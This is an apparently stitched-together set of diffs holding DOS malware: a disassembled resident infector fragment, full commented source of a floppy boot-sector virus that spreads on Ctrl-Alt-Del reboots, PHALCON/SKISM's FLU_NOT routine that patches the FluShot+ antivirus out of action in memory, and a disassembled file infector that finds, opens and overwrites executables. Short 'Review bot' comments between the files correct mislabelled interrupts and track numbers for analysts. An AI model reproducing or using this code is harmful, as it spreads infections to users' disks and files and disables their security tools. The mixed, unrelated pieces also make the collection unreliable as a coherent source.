;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
push bx
mov ax,1220h
int 2Fh ; Multiplex/Spooler al=func 20h
mov bl,es:[di]
mov ax,1216h
int 2Fh ; Multiplex/Spooler al=func 16h
pop bx
lea di,[di+15h] ; Load effective addr
mov bp,200h
retn
sub_1 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
mov ah,3Fh ; '?'
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
pushf ; Push flags
push cs
call sub_4 ; (0248)
retn
sub_2 endp
db 0E8h, 0DFh, 0FFh, 26h, 8Bh, 35h
db 0E8h, 0EFh, 0FFh, 72h, 24h, 3Bh
db 0F5h, 73h, 20h, 50h, 26h, 8Ah
db 45h, 0F8h, 0F6h, 0D0h, 24h, 1Fh
db 75h, 14h, 26h, 3, 75h, 0FCh
db 26h, 87h, 35h, 26h, 1, 6Dh
db 0FCh, 0E8h, 0D0h, 0FFh, 26h, 29h
db 6Dh, 0FCh, 96h, 0ABh
loc_6:
pop ax
loc_7:
pop es
pop si
pop di
pop bp
retf 2 ; Return far
db 0E8h, 0C1h, 0FFh, 9Fh, 8Ah, 0C1h
db 24h, 1Fh
db 3Ch
data_4 db 1Fh
db 75h, 2, 32h, 0C8h
loc_8:
sahf ; Store ah into flags
jmp short loc_6 ; (01F6)
db 55h, 57h, 56h, 6, 0FCh, 8Bh
db 0ECh, 8Eh, 46h, 0Ah, 0BFh, 17h
db 1, 8Bh, 0F7h, 2Eh, 0A7h, 74h
db 22h, 80h, 0FCh, 3Fh, 74h, 0A1h
db 50h, 3Dh, 0, 57h, 74h, 0D1h
db 80h, 0FCh, 3Eh, 9Ch, 53h, 51h
db 52h, 1Eh, 74h, 1Bh, 3Dh, 0
db 4Bh, 74h, 11h
loc_9:
pop ds
pop dx
pop cx
pop bx
popf ; Pop flags
jz loc_6 ; Jump if zero
pop ax
pop es
pop si
pop di
pop bp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
jmp dword ptr cs:data_2e ; (7415:0004=0)
db 0B4h, 3Dh, 0CDh, 21h, 93h, 0E8h
db 55h, 0FFh, 72h, 0E5h, 33h, 0C9h
db 87h, 0CDh, 8Eh, 0DDh, 0BEh, 4Ch
db 0, 0ADh, 50h, 0ADh, 50h, 0B8h
db 24h, 25h, 50h, 0FFh, 74h, 40h
db 0FFh, 74h, 42h, 0Eh, 1Fh, 0BAh
db 67h, 0, 0CDh, 21h, 0C5h, 54h
db 0B0h, 0B0h, 13h, 0CDh, 21h, 6
db 1Fh, 89h, 2Dh, 88h, 6Dh, 0EDh
db 81h, 7Dh, 14h, 4Fh, 4Dh, 75h
db 34h, 8Bh, 55h, 0FCh, 2, 0F5h
db 80h, 0FEh, 4, 72h, 2Ah, 0F6h
db 45h, 0EFh, 4, 75h, 24h, 0C5h
db 75h, 0F2h, 38h, 6Ch, 4, 76h
db 8, 4Ah, 0D0h, 0EEh, 22h, 74h
db 4, 74h, 14h
loc_10:
mov ds,bp
mov dx,cx
call sub_2 ; (01C0)
mov si,dx
dec cx
locloop_11:
lodsb ; String [si] to al
cmp al,cs:data_6e[si] ; (7415:FE07=0)
jne loc_13 ; Jump if not equal
loop locloop_11 ; Loop if cx > 0
loc_12:
mov ah,3Eh ; '>'
call sub_3 ; (01C2)
pop ds
pop dx
pop ax
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
pop ds
pop dx
mov al,13h
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
jmp loc_9 ; (023C)
loc_13:
mov cx,dx
mov si,es:[di-4]
mov es:[di],si
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov al,ds:data_1e ; (0000:0200=0)
push es
pop ds
mov [di-4],si
mov [di],bp
or byte ptr [di-8],1Fh
push cs
pop ds
mov data_4,al ; (7415:0207=1Fh)
mov dx,8
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
or byte ptr es:[di-0Fh],40h ; '@'
jmp short loc_12 ; (02BE)
sub_4 endp
data_5 db 2Ah
seg_a ends
end start
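Review bot: Several of the disassembler's interrupt comments in this section do not match the register values the code loads, and they will mislead anyone triaging the sample. At the top of `five`, `mov ah,13h` precedes both `int 2Fh` calls, yet they are annotated `Multiplex/Spooler al=func 00h get installed status`; INT 2Fh with AH=13h is the DOS call that sets the disk interrupt handler, which is the behaviour worth flagging. Likewise the two `int 21h` calls after loc_12 are labelled `ah=function 00h terminate`, but AX comes from `pop ax` just before the first and only AL is set before the second, so the function number depends on values pushed earlier (those pushes presumably sit in the undecoded DB rows of sub_4). I would replace the comments with `; INT 2Fh AH=13h: set disk interrupt handler` and `; function taken from saved AX - not terminate`.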
@@ -0,0 +1,380 @@
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety. ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory. It redirects the keyboard ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
; it will attempt to infect any floppy it finds in drive A:. ;
; It keeps the real boot sector at track 39, sector 8, head 0 ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus ;
; will die. It also contains no anti detection mechanisms as does the ;
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
; sector 9 because this is common to all floppy formats both single ;
; sided and double sided. It does not contain any malevolent TROJAN ;
; HORSE code. It does appear to contain a count of how many times it ;
; has infected other diskettes although this is harmless and the count ;
; is never accessed. ;
; ;
; Things to note about this virus: ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
; is its primary (only for that matter) means of reproduction to other ;
; floppy diskettes. The only way to remove it from an infected system ;
; is to turn the machine off and reboot an uninfected copy of DOS. ;
; It is even resident when no floppy is booted but BASIC is loaded ;
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
; it activates and infectes the floppy from which the user is ;
; attempting to boot. ;
; ;
; Also note that because of the POP CS command to pass control to ;
; its self in upper memory, this virus does not to work on 80286 ;
; machines (because this is not a valid 80286 instruction). ;
; ;
; The Norton Utilities can be used to identify infected diskettes by ;
; looking at the boot sector and the DOS SYS utility can be used to ;
; remove it (unlike the Pakistani Brain). ;
;-----------------------------------------------------------------------;
;
ORG 7C00H ;
;
TOS LABEL WORD ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset);
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
; 4. Jump to ourself at top of memory ;
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
;-----------------------------------------------------------------------;
BEGIN: CLI ;INITIALIZE STACK
XOR AX,AX ;
MOV SS,AX ;
MOV SP,offset TOS ;
STI ;
;
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
MOV DS,BX ;
MOV AX,[0013H] ;
MUL BX ;
SUB AX,07E0H ; (7C00H+512)/16
MOV ES,AX ;
;
PUSH CS ;DS = CS
POP DS ;
;
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
JNE B_10 ;
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
;
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
MOV DI,SI ;
MOV CX,512 ;
CLD ;
REP MOVSB ;
;
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
MOV CX,128 ;
REP MOVSB ;
;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
NOP
;
PUSH DS ;DS=0 ; ES = DS
POP ES ;
;
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
MOV CX,2708H ; TRACK 40, SECTOR 8
MOV AX,0201H ; READ SECTOR
INT 13H ; (common to 8/9 sect. 1/2 sided!)
JB $ ; HANG IF ERROR
;
JMP JMP_BOOT ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR ;
; ;
; ON ENTRY: DS = 0 ;
; ES = WHERE TO SAVE OLD_09 & (HI) ;
; WHERE NEW_09 IS (HI) ;
;-----------------------------------------------------------------------;
PUT_NEW_09: ;
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
;
MOV SI,9*4 ;COPY INT 9 VECTOR TO
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
MOV CX,0004 ;
;
CLI ;
REP MOVSB ;
MOV Word Ptr [9*4],offset NEW_09
MOV [(9*4)+2],ES ;
STI ;
;
RET ;
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
;-----------------------------------------------------------------------;
ACK_KEYBD: ;
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
MOV AH,AL ;
OR AL,80H ;
OUT 61H,AL ;
XCHG AL,AH ;
OUT 61H,AL ;
JMP RBOOT ;
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
; REASON UNKNOWN ;
;-----------------------------------------------------------------------;
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
DB 27H,0,3,2 ;
DB 27H,0,4,2 ;
DB 27H,0,5,2 ;
DB 27H,0,6,2 ;
DB 27H,0,7,2 ;
DB 27H,0,8,2 ;
;
;A7C9A LABEL BYTE ;
DW 00024H ;NOT USED
DB 0ADH ;
DB 07CH ;
DB 0A3H ;
DW 00026H ;
;
;L7CA1: ;
POP CX ;NOT USED
POP DI ;
POP SI ;
POP ES ;
POP DS ;
POP AX ;
POPF ;
JMP 1111:1111 ;
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ... ;
; IF ALT & CTRL & ? THEN ... ;
;-----------------------------------------------------------------------;
NEW_09: PUSHF ;
STI ;
;
PUSH AX ;
PUSH BX ;
PUSH DS ;
;
PUSH CS ;DS=CS
POP DS ;
;
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
IN AL,60H ;GET SCAN CODE
MOV AH,AL ;SAVE IN AH
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
;
CMP AL,1DH ;IS IT A [CTRL]...
JNE N09_10 ;...JUMP IF NO
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
JMP N09_30 ;
;
N09_10: CMP AL,38H ;IS IT AN [ALT]...
JNE N09_20 ;...JUMP IF NO
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
JMP N09_30 ;
;
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
JNE N09_30 ;...JUMP IF NO
;
CMP AL,17H ;IF [I]...
JE N09_X0 ;...JUMP IF YES
CMP AL,53H ;IF [DEL]...
JE ACK_KEYBD ;...JUMP IF YES
;
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP DS ;
POP BX ;
POP AX ;
POPF ;
;
DB 0EAH ;JMP F000:E987
OLD_09 DW ? ;
DW 0F000H ;
;
N09_X0: JMP N09_X1 ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
MOV AX,0800H ;AL=0, AH=DELAY ARG
OUT DX,AL ;
CALL DELAY ;
MOV [ALT_CTRL],AX ;AX=0 ;
;
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
INT 10H ;
MOV AH,2 ;SET CURSOR POS 0,0
XOR DX,DX ;
MOV BH,DH ; PAGE 0
INT 10H ;
;
MOV AH,1 ;SET CURSOR TYPE
MOV CX,0607H ;
INT 10H ;
;
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
CALL DELAY ;
;
CLI ;
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
;
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
MOV SI,offset BEGIN - 128 ;
MOV CX,128 ;
CLD ;
REP MOVSB ;
;
MOV DS,CX ;CX=0 ;DS=0
;
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
MOV [(19H*4)+2],CS ;
;
MOV AX,0040H ;DS = ROM DATA AREA
MOV DS,AX ;
;
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
;
PUSH DS ;IF BIOS F000:E502 == 21E4...
MOV AX,0F000H ;
MOV DS,AX ;
CMP Word Ptr [0E502H],21E4H ;
POP DS ;
JE R_90 ;
INT 19H ; IF NOT...REBOOT
;
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR ;
;-----------------------------------------------------------------------;
NEW_19: XOR AX,AX ;
;
MOV DS,AX ;DS=0
MOV AX,[0410] ;AX=EQUIP FLAG
TEST AL,1 ;IF FLOPPY DRIVES ...
JNZ N19_20 ;...JUMP
N19_10: PUSH CS ;ELSE ES=CS
POP ES ;
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
INT 18H ;LOAD BASIC
;
N19_20: MOV CX,0004 ;RETRY COUNT = 4
;
N19_22: PUSH CX ;
MOV AH,00 ;RESET DISK
INT 13 ;
JB N19_81 ;
MOV AX,0201 ;READ BOOT SECTOR
PUSH DS ;
POP ES ;
MOV BX,offset BEGIN ;
MOV CX,1 ;TRACK 0, SECTOR 1
INT 13H ;
N19_81: POP CX ;
JNB N19_90 ;
LOOP N19_22 ;
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment. ;
;-----------------------------------------------------------------------;
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
JNZ RE_INFECT ;...RE INFECT
;
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
JMP 0000:7C00H ;
;
;-----------------------------------------------------------------------;
; Reinfection Segment. ;
;-----------------------------------------------------------------------;
RE_INFECT: ;
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
MOV CX,00E6H ; OURSELF
MOV DI,SI ;
PUSH CS ;
POP ES ;
CLD ;
REPE CMPSB ;
JE RI_12 ;IF NOT EQUAL...
;
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
MOV BX,offset TABLE ;FORMAT INFO
MOV DX,0000 ;DRIVE A: HEAD 0
MOV CH,40-1 ;TRACK 39
MOV AH,5 ;FORMAT
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
;
; <<< NO EXECUTION PATH TO HERE >>> ;
JB RI_80 ;
;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
MOV BX,offset BEGIN ;TRACK 40H
MOV CL,8 ;SECTOR 8
MOV AX,0301H ;WRITE 1 SECTOR
INT 13H ;
;
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
POP ES ;
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
;
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
MOV AX,0301 ;
INT 13H ;
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
;
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
INT 19H ;...FLAG AND REBOOT
;
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
JMP JMP_BOOT ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
;
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
MOV BX,0040H ;
MOV DS,BX ;
MOV [0072H],AX ; 0040:0072 = RESET FLAG
JMP N09_90 ;
;
;-----------------------------------------------------------------------;
; DELAY ;
; ;
; ON ENTRY AH:CX = LOOP COUNT ;
;-----------------------------------------------------------------------;
DELAY: SUB CX,CX ;
D_01: LOOP $ ;
SUB AH,1 ;
JNZ D_01 ;
RET ;
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------;
A7DF4 DB 27H,00H,8,2
COUNTER_1 DW 001CH
ALT_CTRL DW 0
A7DFC DB 27H,0,8,2
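Review bot: The comments disagree on where the original boot sector is kept. The file header says track 39, sector 8, head 0, while step 5 of the banner above BEGIN and the comment on `MOV CX,2708H` say track 40, and the comment at RI_10 reads `TRACK 40H`. CH is 27H in that load, which is 39 decimal, and the format setup uses `MOV CH,40-1`, so these presumably all mean the 0-based track 39 (the 40th track). Anyone recovering a diskette needs that location to be unambiguous, because the header states the sector is not marked bad in the FAT and can be overwritten by a file. I would make all three comments read `;TRACK 39 (CH=27H, 0-BASED), SECTOR 8, HEAD 0`.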
@@ -0,0 +1,91 @@
; FLU_NOT.ASM þ Routines to be linked into your FluShot+ resistant
; þ programs.
; Version 1.0 þ 27 November 1991
;
; Written by Dark Angel and Demogorgon of PHALCON/SKISM Co-op
; Look for more Anti-Anti-Viral Utilities from us!
;
; Notes:
; This is different from the C routines. Call Flu_Not to disable and
; Flu_Restore to reenable (at the end of your program, of course). Try
; not to call Flu_Not more than once in your program. To disable again,
; simply use:
; les si, dword ptr flu_off
; mov es:[si], 593Ch
; (actually, this probably won't work in the .ASM file, but you can write
; the routine yourself and put it in this file.)
Public Flu_Not, Flu_Restore
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE
org 100h
flu_off dd 0
flu_seg dd 0
Flu_Not Proc Near
push ax
push bx
push bp
mov word ptr cs:[flu_seg], 0
mov ax, 0FF0Fh ; Check if FluShot+ resident
int 21h
cmp ax, 0101h
jnz No_puny_flus ; If not, no work to be done
Kill_Puny_Flus: ; Otherwise, find the
push es ; FluShot+ segment
xor ax, ax
mov es, ax
mov bx, 004Eh ; Get int 13h handler's
mov ax, es:[bx] ; segment
mov es, ax ; ES is now FSEG - YES!
mov bp, 1000h ; Start at FSEG:1000
Froopy_Loopy:
cmp word ptr es:[bp], 593Ch ; Try to find marker bytes
jz Happy_Loop ; NOTE: No need to set
inc bp ; counter because FluShot+
jmp Froopy_Loopy ; is guaranteed to be in
Happy_Loop: ; memory by the INT 21h call
cmp word ptr es:[bp], 'RP' ; Look backwards for the
jz Found_It_Here ; beginning of the function
dec bp
jmp Happy_Loop
; If you are paranoid, you can add other checks, such as
; (in Froopy_Loopy) cmp bp, 5000h, jz No_Puny_Flus and
; (in Happy_Loop) cmp bp, 1000h, jz No_Puny_Flus, but there
; is really no need.
Found_It_Here:
mov word ptr es:[bp], 0C3F8h ; Key to everything - replace
mov word ptr cs:[flu_seg], es ; function's starting bytes
mov word ptr cs:[flu_off], bp ; Save the flu_offset
pop es
No_Puny_Flus:
pop bp
pop bx
pop ax
ret
Flu_Not Endp
Flu_Restore Proc Near
push ax
push bx
push es
les bx, dword ptr cs:[offset flu_off] ; Load ES:BX with Seg:Off
mov ax, es
or ax, ax
jz No_FluShot
mov word ptr es:[bx], 5250h
No_FluShot:
pop es
pop bx
pop ax
ret
Flu_Restore Endp
CODE ENDS
END
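Review bot: The header notes never state what this routine changes in the resident monitor, which is the part an analyst needs. Found_It_Here overwrites the word at the located function start with `0C3F8h` (bytes F8 C3, CLC / RET), so the patched function returns immediately with carry clear. Flu_Restore is written to put `5250h` back. The change is made only in memory, so I would document the indicator next to the write, for example `; in-memory patch of the resident monitor: entry word 5250h -> 0C3F8h`. A second comment should note that a self-checksum of the monitor's code segment would presumably expose the modification.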
+484
@@ -0,0 +1,484 @@
1000:0000 Proc3:
1000:0000 cd 20 INT 20h ;Exit
1000:0079 Data37:
1000:0100 e4 40 Main: IN AL, 40h
1000:0102 86 e0 XCHG AH, AL
1000:0104 e4 40 IN AL, 40h
1000:0106 a3 a205 MOV WORD PTR [Data0], AX
1000:0109 be 1601 MOV SI, 0116h
1000:010c e8 8f04 CALL Proc0
1000:010f e9 0100 JMP Jmp0
1000:0112 db c3
1000:0113 Jmp0:
1000:0113 e8 8404 CALL Proc1
1000:0116 Data9:
1000:0116 e8 0000 CALL Proc2
1000:0119 Proc2:
1000:0119 5d POP BP
1000:011a 81 ed 1901 SUB BP, 0119h
1000:011e eb 01 JMP Jmp1
1000:0120 db 81
1000:0121 Jmp1:
1000:0121 e4 21 IN AL, 21h
1000:0123 0c 02 OR AL, 02h
1000:0125 e6 21 OUT AL, 21h
1000:0127 b9 0300 MOV CX, 0003h
1000:012a bf 0001 MOV DI, 0100h
1000:012d 57 PUSH DI
1000:012e 8d b6 5204 LEA SI, WORD PTR [BP+Data1]
1000:0132 fc CLD
1000:0133 f3 REPNZ
1000:0134 a4 MOVSB
1000:0135 b4 47 MOV AH, 47h
1000:0137 32 d2 XOR DL, DL
1000:0139 8d b6 ae04 LEA SI, WORD PTR [BP+Data2]
1000:013d cd 21 INT 21h ;Get current directory
1000:013f b4 2f MOV AH, 2fh
1000:0141 cd 21 INT 21h ;Get DTA
1000:0143 06 PUSH ES
1000:0144 53 PUSH BX
1000:0145 b8 2435 MOV AX, 3524h
1000:0148 cd 21 INT 21h ;Get int vector 0x24
1000:014a 3e
1000:014b 89 9e ee04 MOV WORD PTR DS:[BP+Data3], BX
1000:014f 3e
1000:0150 8c 86 f004 MOV WORD PTR DS:[BP+Data4], ES
1000:0154 0e PUSH CS
1000:0155 07 POP ES
1000:0156 fa CLI
1000:0157 b4 25 MOV AH, 25h
1000:0159 8d 96 4004 LEA DX, WORD PTR [BP+Data5]
1000:015d cd 21 INT 21h ;Set int vector 0x24
1000:015f fb STI
1000:0160 3e
1000:0161 83 be a205 00 CMP WORD PTR DS:[BP+Data6], 00h
1000:0166 75 03 JNZ Jmp2
1000:0168 e9 4602 JMP Jmp3
1000:016b Jmp2:
1000:016b b4 1a MOV AH, 1ah
1000:016d 8d 96 6104 LEA DX, WORD PTR [BP+Data11]
1000:0171 cd 21 INT 21h ;Set DTA
1000:0173 e8 b402 CALL Proc4
1000:0176 b1 05 MOV CL, 05h
1000:0178 d2 e8 SHR AL, CL
1000:017a fe c0 INC AL
1000:017c 3e
1000:017d 88 86 5104 MOV BYTE PTR DS:[BP+Data12], AL
1000:0181 Jmp7:
1000:0181 b4 4e MOV AH, 4eh
1000:0183 8d 96 5804 LEA DX, WORD PTR [BP+Data13]
1000:0187 eb 31 JMP Jmp5
1000:0189 db 90
1000:018a Jmp10:
1000:018a b8 0157 MOV AX, 5701h
1000:018d 3e
1000:018e 8b 8e 7704 MOV CX, WORD PTR DS:[BP+Data17]
1000:0192 3e
1000:0193 8b 96 7904 MOV DX, WORD PTR DS:[BP+Data18]
1000:0197 cd 21 INT 21h ;Get/set file timestamp
1000:0199 b4 3e MOV AH, 3eh
1000:019b cd 21 INT 21h ;Close file
1000:019d b8 0143 MOV AX, 4301h
1000:01a0 32 ed XOR CH, CH
1000:01a2 3e
1000:01a3 8a 8e 7604 MOV CL, BYTE PTR DS:[BP+Data19]
1000:01a7 8d 96 7f04 LEA DX, WORD PTR [BP+Data15]
1000:01ab cd 21 INT 21h ;Change file attributes
1000:01ad 3e
1000:01ae 80 be 5104 00 CMP BYTE PTR DS:[BP+Data12], 00h
1000:01b3 75 03 JNZ Jmp12
1000:01b5 e9 f901 JMP Jmp3
1000:01b8 Jmp12:
1000:01b8 b4 4f MOV AH, 4fh
1000:01ba Jmp5:
1000:01ba b9 0600 MOV CX, 0006h
1000:01bd cd 21 INT 21h ;Find file
1000:01bf 73 12 JNB Jmp6
1000:01c1 3e
1000:01c2 fe 86 5104 INC BYTE PTR DS:[BP+Data12]
1000:01c6 b4 3b MOV AH, 3bh
1000:01c8 8d 96 5e04 LEA DX, WORD PTR [BP+Data14]
1000:01cc cd 21 INT 21h ;Change directory
1000:01ce 73 b1 JNB Jmp7
1000:01d0 e9 de01 JMP Jmp3
1000:01d3 Jmp6:
1000:01d3 b8 0143 MOV AX, 4301h
1000:01d6 33 c9 XOR CX, CX
1000:01d8 8d 96 7f04 LEA DX, WORD PTR [BP+Data15]
1000:01dc cd 21 INT 21h ;Change file attributes
1000:01de b8 023d MOV AX, 3d02h
1000:01e1 cd 21 INT 21h ;Open file
1000:01e3 73 03 JNB Jmp8
1000:01e5 e9 c901 JMP Jmp3
1000:01e8 Jmp8:
1000:01e8 93 XCHG AX, BX
1000:01e9 83 fb 04 CMP BX, 04h
1000:01ec 77 03 JA Jmp9
1000:01ee e9 c001 JMP Jmp3
1000:01f1 Jmp9:
1000:01f1 3e
1000:01f2 89 9e 4f04 MOV WORD PTR DS:[BP+Data16], BX
1000:01f6 b4 3f MOV AH, 3fh
1000:01f8 b9 0300 MOV CX, 0003h
1000:01fb 8d 96 5204 LEA DX, WORD PTR [BP+Data1]
1000:01ff cd 21 INT 21h ;Read file
1000:0201 e8 0302 CALL Proc5
1000:0204 3d 73bb CMP AX, bb73h
1000:0207 73 81 JNB Jmp10
1000:0209 3d f401 CMP AX, 01f4h
1000:020c 73 03 JNB Jmp11
1000:020e e9 79ff JMP Jmp10
1000:0211 Jmp11:
1000:0211 3e
1000:0212 80 be 5204 e9 CMP BYTE PTR DS:[BP+Data1], e9h
1000:0217 75 0d JNZ Jmp13
1000:0219 3e
1000:021a 2b 86 5304 SUB AX, WORD PTR DS:[BP+Data20]
1000:021e 3d 9e04 CMP AX, 049eh
1000:0221 75 03 JNZ Jmp13
1000:0223 e9 64ff JMP Jmp10
1000:0226 Jmp13:
1000:0226 e8 0102 CALL Proc4
1000:0229 b1 06 MOV CL, 06h
1000:022b d3 e8 SHR AX, CL
1000:022d 50 PUSH AX
1000:022e e8 f901 CALL Proc4
1000:0231 92 XCHG AX, DX
1000:0232 33 c0 XOR AX, AX
1000:0234 8e d8 MOV DS, AX
1000:0236 b4 40 MOV AH, 40h
1000:0238 59 POP CX
1000:0239 cd 21 INT 21h ;Write file
1000:023b 0e PUSH CS
1000:023c 1f POP DS
1000:023d e8 c701 CALL Proc5
1000:0240 e8 e701 CALL Proc4
1000:0243 0b c0 OR AX, AX
1000:0245 75 03 JNZ Jmp14
1000:0247 e9 6701 JMP Jmp3
1000:024a Jmp14:
1000:024a 3e
1000:024b 89 86 a205 MOV WORD PTR DS:[BP+Data6], AX
1000:024f 3e
1000:0250 89 9e 8105 MOV WORD PTR DS:[BP+Data21], BX
1000:0254 b9 2600 MOV CX, 0026h
1000:0257 8d b6 7405 LEA SI, WORD PTR [BP+Data22]
1000:025b 8d be ad05 LEA DI, WORD PTR [BP+Data8]
1000:025f fc CLD
1000:0260 f3 REPNZ
1000:0261 a4 MOVSB
1000:0262 e8 b701 CALL Proc6
1000:0265 d0 e8 SHR AL, 1
1000:0267 3c 02 CMP AL, 02h
1000:0269 72 1f JB Jmp15
1000:026b 77 3a JA Jmp16
1000:026d 3e
1000:026e c6 86 9b05 e3 MOV BYTE PTR DS:[BP+Data23], e3h
1000:0273 3e
1000:0274 c6 86 9d05 37 MOV BYTE PTR DS:[BP+Data24], 37h
1000:0279 3e
1000:027a c7 86 a405 3104 MOV WORD PTR DS:[BP+Jmp4], 0431h
1000:0280 3e
1000:0281 c7 86 a805 4646 MOV WORD PTR DS:[BP+Data25], 4646h
1000:0287 eb 38 JMP Jmp17
1000:0289 db 90
1000:028a Jmp15:
1000:028a 3e
1000:028b c6 86 9b05 e7 MOV BYTE PTR DS:[BP+Data23], e7h
1000:0290 3e
1000:0291 c6 86 9d05 1d MOV BYTE PTR DS:[BP+Data24], 1dh
1000:0296 3e
1000:0297 c7 86 a405 3107 MOV WORD PTR DS:[BP+Jmp4], 0731h
1000:029d 3e
1000:029e c7 86 a805 4343 MOV WORD PTR DS:[BP+Data25], 4343h
1000:02a4 eb 1b JMP Jmp17
1000:02a6 db 90
1000:02a7 Jmp16:
1000:02a7 3e
1000:02a8 c6 86 9b05 e6 MOV BYTE PTR DS:[BP+Data23], e6h
